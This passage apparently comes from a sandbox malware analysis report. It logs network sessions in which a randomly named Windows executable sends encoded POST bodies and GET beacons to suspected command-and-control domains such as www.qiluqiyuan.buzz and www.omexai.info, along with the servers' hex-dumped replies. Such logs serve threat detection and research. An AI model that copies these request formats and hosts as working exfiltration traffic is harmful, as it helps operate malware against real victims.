                              Data Raw: 4b 78 64 4c 67 4e 69 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 38 61 32 57 72 35 58 4d 4d 6c 53 33 74 43 6a 39 4b 7a 58 59 6a 56 75 55 55 41 72 66 5a 6c 30 62 79 57 71 33 5a 79 68 37 56 50 7a 6c 56 38 72 6a 75 2f 77 65 38 5a 38 56 64 6f 48 52 59 36 50 4f 65 6b 48 67 4d 2b 53 77 47 78 4a 38 37 4a 5a 6b 42 79 48 4a 33 6c 55 75 47 43 31 34 55 6a 77 4f 68 4d 2b 4f 31 33 70 48 4d 2f 7a 6c 4e 39 39 34 75 44 39 69 77 74 43 35 79 65 59 63 30 6e 31 4b 6e 68 4e 63 4d 4b 78 42 30 43 75 65 77 4f 32 68 68 39 6d 62 6a 4b 39 48 51 4c 64 4f 73 39 4f 52 48 46 5a 50 35 79 52 6f 76 42 4b 76 4a 37 41 6a 48 2f 39 79 61 74 54 78 37 53 53 59 61 35 67 62 41 45 4f 71 2f 50 4d 75 45 57 63 71 6e 6a 35
                              Data Ascii: KxdLgNi=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZl0byWq3Zyh7VPzlV8rju/we8Z8VdoHRY6POekHgM+SwGxJ87JZkByHJ3lUuGC14UjwOhM+O13pHM/zlN994uD9iwtC5yeYc0n1KnhNcMKxB0CuewO2hh9mbjK9HQLdOs9ORHFZP5yRovBKvJ7AjH/9yatTx7SSYa5gbAEOq/PMuEWcqnj5
                              Aug 30, 2024 09:19:23.357841969 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:19:23 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Aug 30, 2024 09:19:23.357861996 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.549741161.97.168.245805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:25.375932932 CEST1767OUTPOST /p6o9/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.qiluqiyuan.buzz
                              Origin: http://www.qiluqiyuan.buzz
                              Referer: http://www.qiluqiyuan.buzz/p6o9/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 55 6b 44 66 62 38 68 68 45 7a 76 38 4b 38 61 32 57 72 35 58 4d 4d 6c 53 33 74 43 6a 39 4b 7a 58 59 6a 56 75 55 55 41 72 66 5a 39 30 63 42 65 71 32 36 4b 68 70 6c 50 7a 73 31 38 71 6a 75 2f 78 65 38 42 34 56 64 31 79 52 61 43 50 50 34 77 48 33 4e 2b 53 35 47 78 4a 77 62 4a 55 70 68 7a 4e 4a 30 4e 51 75 47 53 31 34 55 6a 77 4f 6a 45 2b 4f 68 6a 70 42 4d 2f 38 79 39 39 35 31 4f 44 46 69 77 45 33 35 79 4b 69 62 48 2f 31 4b 47 52 4e 50 65 53 78 63 45 43 73 66 77 4f 75 68 6b 6c 6c 62 6a 57 62 48 51 4f 77 4f 72 78 4f 54 41 38 6e 59 59 57 54 31 64 52 61 6a 4c 37 61 78 48 6d 52 77 70 70 58 74 4a 79 4f 66 37 74 33 55 32 77 38 72 64 4b 68 7a 6c 4b 76 69 58 53 43 38 34 6b 53 47 4f 71 71 66 4c 6f 2b 36 58 4d 6b 49 59 6c 64 4b 46 58 6b 42 2f 63 45 75 43 5a 4c 59 30 61 6b 6b 61 73 64 75 70 43 32 54 61 55 63 78 75 73 65 5a 63 75 51 61 6d 2f 56 61 51 33 31 74 7a 75 63 70 58 69 68 6f 39 78 33 64 38 30 70 63 7a 76 37 64 34 65 56 6b 52 74 44 56 4d 66 6b 67 68 75 2b 68 4e 63 69 75 47 43 72 43 77 [TRUNCATED]
                              Data Ascii: KxdLgNi=UkDfb8hhEzv8K8a2Wr5XMMlS3tCj9KzXYjVuUUArfZ90cBeq26KhplPzs18qju/xe8B4Vd1yRaCPP4wH3N+S5GxJwbJUphzNJ0NQuGS14UjwOjE+OhjpBM/8y9951ODFiwE35yKibH/1KGRNPeSxcECsfwOuhkllbjWbHQOwOrxOTA8nYYWT1dRajL7axHmRwppXtJyOf7t3U2w8rdKhzlKviXSC84kSGOqqfLo+6XMkIYldKFXkB/cEuCZLY0akkasdupC2TaUcxuseZcuQam/VaQ31tzucpXiho9x3d80pczv7d4eVkRtDVMfkghu+hNciuGCrCwgDMXCsZlKFW568eRh3x0+pM6moGh/miExteiiVgSx710+oUqsCDAN4ZmR/wKh/GheRNaZO+lsnQkCYOynMkS0Ofwd0/+2CS1p90Rn8Z6zaE9P2x0neipc2cS3JrpaS6dsnOtd9TY/+Koxn0CH86tKdl5evvkE+dLL4sPNMMAhG4K8uRDeCRgq1NhRCfXuiDgWPE8Ceoj8V/vPXx35PUOoKjsu+JmVjhp4CD10JrgMB8GkxILBlFgGczMHakSqb/uzRDZY6A4obETxaNNdn3pZiXb/MrqPO+AKpbxNAYBSE/74D//M9VgXWjr3VW59xi3IyRBsD3WA9aN1ru30WYjwtdzqcJooLtiCn/QFtzw4Lt1rS9A1ZcPsu26f3m1LQIytqYSjJfy32f+5qu96bfGoqTwtC88WxfRJUZ9t3OAsTHaMkNxvztP6tIqsQ7tKEP4UygeGA2xGQVEojMC4JPLcRN8bxPo7N6lbx2m0v0bzMDuITNuPM1sVG0Mx40eYWEFF1+y9pXIWQ7x20wXNCDuUig5B1JfdRdCNzW1VUXgOdzECtNt6XZSeJ+VPPF6tVyJ2oJS0YFPrHrTpQspvR3jjQ18LIKyGC0Ua9FIkA1xBojHQb9qrUnMq/fRkd6YiJXV1F4qBnNMCMvdCwRPED8eNkKnbMmnvcafxo [TRUNCATED]
                              Aug 30, 2024 09:19:25.970232964 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:19:25 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: W/"66cd104a-b96"
                              Content-Encoding: gzip
                              Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                              Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
                              Aug 30, 2024 09:19:25.970263004 CEST370INData Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                              Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.549742161.97.168.245805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:28.139924049 CEST461OUTGET /p6o9/?KxdLgNi=Zmr/YL1wBhH5EvOXWek0Ss4N+9SYg/Tcexp1DhQNUfR7ECek+Jud5GyO11J5h9itVrdZedwNG4+zKYxY7NG/zhQPgbZq8SnGCnwklmLK8GK6RzRHGkXrXeG9xuoq/9Gyzw==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.qiluqiyuan.buzz
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:19:28.745414019 CEST1236INHTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Fri, 30 Aug 2024 07:19:28 GMT
                              Content-Type: text/html; charset=utf-8
                              Content-Length: 2966
                              Connection: close
                              Vary: Accept-Encoding
                              ETag: "66cd104a-b96"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
                              Aug 30, 2024 09:19:28.745436907 CEST1236INData Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                              Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
                              Aug 30, 2024 09:19:28.745450020 CEST698INData Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                              Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.5497433.33.130.190805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:33.795469999 CEST718OUTPOST /45sz/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.omexai.info
                              Origin: http://www.omexai.info
                              Referer: http://www.omexai.info/45sz/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 54 44 65 35 51 68 7a 66 51 6a 59 5a 2f 6d 2f 6b 50 4b 59 72 35 4e 42 41 52 55 74 58 34 46 4b 51 43 67 58 39 72 56 56 4e 66 4d 72 73 4a 58 70 45 56 45 2b 4f 4f 54 4b 6d 6a 68 71 31 4f 4c 68 45 4e 48 30 41 45 37 30 44 68 74 62 74 42 37 45 39 39 78 4e 6a 69 2f 4d 67 44 4b 53 30 4a 68 33 7a 57 68 4f 77 72 71 6a 75 7a 63 51 50 6b 6e 65 51 6d 44 53 39 59 38 37 4a 67 71 66 6b 30 32 66 61 7a 71 78 76 2b 48 30 71 2b 52 71 69 68 6e 31 45 45 51 74 65 43 37 5a 71 31 4f 65 75 2f 59 4c 50 63 6c 57 72 69 70 6e 41 77 2f 47 6f 4b 69 31 76 34 50 65 73 53 41 76 79 7a 55 6b 3d
                              Data Ascii: KxdLgNi=9m4WgTCjo+FGTDe5QhzfQjYZ/m/kPKYr5NBARUtX4FKQCgX9rVVNfMrsJXpEVE+OOTKmjhq1OLhENH0AE70DhtbtB7E99xNji/MgDKS0Jh3zWhOwrqjuzcQPkneQmDS9Y87Jgqfk02fazqxv+H0q+Rqihn1EEQteC7Zq1Oeu/YLPclWripnAw/GoKi1v4PesSAvyzUk=


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.5497443.33.130.190805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:36.333549976 CEST738OUTPOST /45sz/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.omexai.info
                              Origin: http://www.omexai.info
                              Referer: http://www.omexai.info/45sz/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 75 51 43 41 6e 39 36 6b 56 4e 65 4d 72 73 42 33 70 4c 62 6b 2f 43 4f 54 48 62 6a 6b 53 31 4f 4c 31 45 4e 47 45 41 45 49 4d 4d 6e 74 62 76 4f 62 45 2f 7a 52 4e 6a 69 2f 4d 67 44 4c 32 53 4a 68 76 7a 57 77 65 77 70 49 4c 70 77 63 51 4f 68 58 65 51 69 44 53 35 59 38 37 76 67 76 33 65 30 77 44 61 7a 75 35 76 77 79 41 70 6c 68 72 6e 6c 6e 30 49 53 51 4d 57 4b 4e 70 68 6f 49 72 32 6f 72 57 7a 64 54 37 42 34 4c 76 6f 6a 66 71 51 61 78 39 59 70 2f 2f 46 49 6a 2f 43 74 44 77 66 33 54 6c 75 34 2f 6f 66 50 2f 4e 37 4b 43 6a 2b 75 32 69 77
                              Data Ascii: KxdLgNi=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43uQCAn96kVNeMrsB3pLbk/COTHbjkS1OL1ENGEAEIMMntbvObE/zRNji/MgDL2SJhvzWwewpILpwcQOhXeQiDS5Y87vgv3e0wDazu5vwyAplhrnln0ISQMWKNphoIr2orWzdT7B4LvojfqQax9Yp//FIj/CtDwf3Tlu4/ofP/N7KCj+u2iw


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.5497453.33.130.190805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:38.913570881 CEST1755OUTPOST /45sz/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.omexai.info
                              Origin: http://www.omexai.info
                              Referer: http://www.omexai.info/45sz/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 39 6d 34 57 67 54 43 6a 6f 2b 46 47 52 6a 4f 35 53 43 72 66 57 44 59 61 36 6d 2f 6b 56 36 59 6e 35 4e 4e 41 52 51 39 48 34 33 6d 51 43 53 76 39 6f 33 4e 4e 5a 4d 72 73 41 33 70 62 62 6b 2b 59 4f 54 75 51 6a 6b 57 50 4f 4a 4e 45 4d 6b 4d 41 4e 5a 4d 4d 30 4e 62 76 57 62 45 2b 39 78 4e 4d 69 2f 63 6b 44 4b 47 53 4a 68 76 7a 57 79 32 77 67 36 6a 70 32 63 51 50 6b 6e 65 63 6d 44 54 75 59 38 7a 52 67 76 36 68 31 44 62 61 7a 4f 70 76 39 6b 73 70 34 52 72 70 72 48 31 56 53 51 41 5a 4b 4e 64 44 6f 4d 72 63 6f 72 2b 7a 63 57 57 4e 69 59 66 33 69 64 79 56 61 67 31 67 30 5a 6d 6e 47 42 76 46 67 78 77 61 31 58 39 62 79 37 59 37 4b 2b 34 75 51 46 54 61 6b 7a 2f 63 58 7a 70 78 6a 32 74 34 56 63 61 69 50 2f 52 67 6d 68 45 46 35 68 42 6f 4f 36 6e 48 54 38 45 73 6c 75 73 63 36 67 38 79 70 50 55 41 36 41 4d 35 6f 74 66 69 4d 4a 6a 73 57 4f 46 44 38 43 4c 6b 46 39 4d 59 6a 41 75 6e 46 30 2f 4e 49 2f 2f 57 4e 2b 6b 2f 4f 6b 65 58 53 47 70 36 62 46 58 64 31 6a 6d 69 58 66 66 6f 6b 38 4e 6f 7a 43 [TRUNCATED]
                              Data Ascii: KxdLgNi=9m4WgTCjo+FGRjO5SCrfWDYa6m/kV6Yn5NNARQ9H43mQCSv9o3NNZMrsA3pbbk+YOTuQjkWPOJNEMkMANZMM0NbvWbE+9xNMi/ckDKGSJhvzWy2wg6jp2cQPknecmDTuY8zRgv6h1DbazOpv9ksp4RrprH1VSQAZKNdDoMrcor+zcWWNiYf3idyVag1g0ZmnGBvFgxwa1X9by7Y7K+4uQFTakz/cXzpxj2t4VcaiP/RgmhEF5hBoO6nHT8Eslusc6g8ypPUA6AM5otfiMJjsWOFD8CLkF9MYjAunF0/NI//WN+k/OkeXSGp6bFXd1jmiXffok8NozCDYWEejlB93cbKKdjxm7lUpJlHuFtqgdfcZMdrSBQ2Aj8cxU+uWmSvnTiO7RUttozxF65begLhMC2Qf6375s6HwJ0T+QQy4Aq1iDtyZoTey1w4Ond07XwpCJLn7oJzAg12RPJb55dPx0wZvnq7YBI9o5+N2Tr5irBKIWxma1+OPQPz6k9lZnP+lu5p0QB46y+lnU2+RtFUzxMvN3iibwKgEf3hMCCotztX8Phr57D0dZKFiZOd1pk/U4QtxzKFqPvs6Qgl0vY3d3nrE52Jut0exNIl/f39mCPUCYZnp/WSCh2F/uc2hYQ7GiubtGR6PTsq+1Q9NwHPHWIbKe1uRhbxjKx/I+Zn+Q8frcJOkpCiU9eU0ZF6p5avtkY7rJuIaS6ljR/K6fUPvLfEbT17vbpGyRQ3a2kTHz+2hEzJ/km/XENyiVQ/zpAmQ60WKSM0vwiUfPMFOsgNhBtCGzsQqUUNx+xOZ2G4JDZbgzIfUAC4etPWluYYdqbR7qItKoucbAwO53db6hi4foCLALrtdRh5srlyHquXD2Z8l/fkAgmqUzkh2fzZAh9t1q3fgDT5FBkrEebFlQqTr7VO09dYktOni2gd9jQO5/NovEiI6h/ehhFJfRlru3hA9g+U00pdbBz2LPoNnqk2FyqskGnOp4baqvn6za70eggTx [TRUNCATED]


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.5497463.33.130.190805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:19:41.457484007 CEST457OUTGET /45sz/?lL2=1ZRtX&KxdLgNi=wkQ2jmS8yMxgRlKUPxXZOSJfy276TIgV39hMR0do1D6sDTDom055RMGGVlZFQUvdDVO+pgeKf5JaLn1AK40x/tSYSMAamA14mf1kJ7jyRRC6WiyMsI3Xnv4BkXKynB7mMQ== HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.omexai.info
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:19:42.855679035 CEST405INHTTP/1.1 200 OK
                              Server: openresty
                              Date: Fri, 30 Aug 2024 07:19:42 GMT
                              Content-Type: text/html
                              Content-Length: 265
                              Connection: close
